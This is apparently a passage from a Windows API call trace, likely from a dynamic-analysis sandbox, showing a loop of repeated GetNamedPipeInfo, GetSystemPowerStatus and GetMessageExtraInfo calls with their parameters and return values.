	[0129.875] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.875] GetMessageExtraInfo () returned 0x0
	[0129.883] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.883] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.883] GetMessageExtraInfo () returned 0x0
	[0129.884] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.884] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.884] GetMessageExtraInfo () returned 0x0
	[0129.885] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.885] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.885] GetMessageExtraInfo () returned 0x0
	[0129.886] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.886] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.886] GetMessageExtraInfo () returned 0x0
	[0129.887] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.887] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.887] GetMessageExtraInfo () returned 0x0
	[0129.888] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.888] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.888] GetMessageExtraInfo () returned 0x0
	[0129.889] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.889] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.889] GetMessageExtraInfo () returned 0x0
	[0129.904] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.904] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.904] GetMessageExtraInfo () returned 0x0
	[0129.905] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.905] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.905] GetMessageExtraInfo () returned 0x0
	[0129.906] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.906] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.906] GetMessageExtraInfo () returned 0x0
	[0129.906] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.906] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.906] GetMessageExtraInfo () returned 0x0
	[0129.907] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.907] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.907] GetMessageExtraInfo () returned 0x0
	[0129.907] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.907] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.907] GetMessageExtraInfo () returned 0x0
	[0129.908] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.908] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.908] GetMessageExtraInfo () returned 0x0
	[0129.909] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.909] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.909] GetMessageExtraInfo () returned 0x0
	[0129.909] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.909] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.909] GetMessageExtraInfo () returned 0x0
	[0129.910] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.910] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.910] GetMessageExtraInfo () returned 0x0
	[0129.910] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.910] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.910] GetMessageExtraInfo () returned 0x0
	[0129.911] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.911] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.911] GetMessageExtraInfo () returned 0x0
	[0129.911] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.911] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.911] GetMessageExtraInfo () returned 0x0
	[0129.912] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.912] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.912] GetMessageExtraInfo () returned 0x0
	[0129.986] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.986] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.986] GetMessageExtraInfo () returned 0x0
	[0129.988] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.988] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.988] GetMessageExtraInfo () returned 0x0
	[0129.989] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.989] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.989] GetMessageExtraInfo () returned 0x0
	[0129.989] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.989] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.989] GetMessageExtraInfo () returned 0x0
	[0129.990] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.990] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.990] GetMessageExtraInfo () returned 0x0
	[0129.991] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.991] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.991] GetMessageExtraInfo () returned 0x0
	[0129.991] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.991] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.991] GetMessageExtraInfo () returned 0x0
	[0129.992] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.992] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.992] GetMessageExtraInfo () returned 0x0
	[0129.992] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.992] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.992] GetMessageExtraInfo () returned 0x0
	[0129.993] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.993] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.993] GetMessageExtraInfo () returned 0x0
	[0129.993] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.993] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.993] GetMessageExtraInfo () returned 0x0
	[0130.008] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.008] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.008] GetMessageExtraInfo () returned 0x0
	[0130.026] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.026] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.026] GetMessageExtraInfo () returned 0x0
	[0130.027] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.027] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.027] GetMessageExtraInfo () returned 0x0
	[0130.028] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.028] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.028] GetMessageExtraInfo () returned 0x0
	[0130.028] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.028] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.028] GetMessageExtraInfo () returned 0x0
	[0130.029] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.029] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.029] GetMessageExtraInfo () returned 0x0
	[0130.034] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.034] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.034] GetMessageExtraInfo () returned 0x0
	[0130.038] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.038] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.038] GetMessageExtraInfo () returned 0x0
	[0130.044] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.044] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.044] GetMessageExtraInfo () returned 0x0
	[0130.044] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.044] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.044] GetMessageExtraInfo () returned 0x0
	[0130.045] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.045] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.045] GetMessageExtraInfo () returned 0x0
	[0130.056] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.056] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.056] GetMessageExtraInfo () returned 0x0
	[0130.057] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.057] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.057] GetMessageExtraInfo () returned 0x0
	[0130.058] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.058] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.058] GetMessageExtraInfo () returned 0x0
	[0130.058] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.058] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.058] GetMessageExtraInfo () returned 0x0
	[0130.059] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.059] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.059] GetMessageExtraInfo () returned 0x0
	[0130.060] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.060] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.060] GetMessageExtraInfo () returned 0x0
	[0130.061] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.061] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.061] GetMessageExtraInfo () returned 0x0
	[0130.061] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.061] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.062] GetMessageExtraInfo () returned 0x0
	[0130.073] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.073] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.073] GetMessageExtraInfo () returned 0x0
	[0130.074] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.074] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.074] GetMessageExtraInfo () returned 0x0
	[0130.074] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.074] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.074] GetMessageExtraInfo () returned 0x0
	[0130.075] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.075] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.075] GetMessageExtraInfo () returned 0x0
	[0130.076] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.076] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.076] GetMessageExtraInfo () returned 0x0
	[0130.093] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.093] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.093] GetMessageExtraInfo () returned 0x0
	[0130.094] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.094] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.094] GetMessageExtraInfo () returned 0x0
	[0130.095] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.095] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.095] GetMessageExtraInfo () returned 0x0
	[0130.096] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.096] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.096] GetMessageExtraInfo () returned 0x0
	[0130.097] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.097] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.097] GetMessageExtraInfo () returned 0x0
	[0130.097] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.097] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.097] GetMessageExtraInfo () returned 0x0
	[0130.098] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.098] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.098] GetMessageExtraInfo () returned 0x0
	[0130.102] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
